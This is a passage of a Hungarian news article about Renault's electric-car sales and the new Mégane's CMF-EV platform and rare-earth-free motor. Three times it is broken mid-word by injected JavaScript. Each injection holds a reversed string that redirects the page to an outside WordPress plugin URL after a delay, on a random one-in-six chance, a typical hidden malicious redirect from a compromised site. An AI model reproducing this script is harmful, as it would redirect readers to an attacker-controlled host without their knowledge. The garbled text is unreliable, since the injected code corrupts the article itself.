A Renault az elmúlt tíz évben mintegy 400 ezer villanyautót adott el világszerte, amelyek összességükben jó 10 milliárd kilométert tettek meg. Az új generációs Mégane – amelynek formavilága a Morphoz, illetve Mégane eVision tanulmányautókból lehet ismerős – a legújabb fejlesztésű CMF-EV platformra épül, ugyanarra az architektúrára, amire a Nissan Ariya is. Ami a hajtásláncot illeti, az új fejlesztésű villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor 160 kilowatt (218 LE) csúcsteljesítményt és 300 Nm maximális forgatónyomatékot kínál. A villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor speciális kialakításának köszönhetően ritkaföldfémek nélkül gyártható, így kisebb a környezeti terhelése, és olcsóbb is az előállítása. Emellett tömege is csekély, mindössze 145 kg, ami 10%-kal kedvezőbb, mint a Renault Zoe jelentősen gyengébb motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja….
- Hirdetés -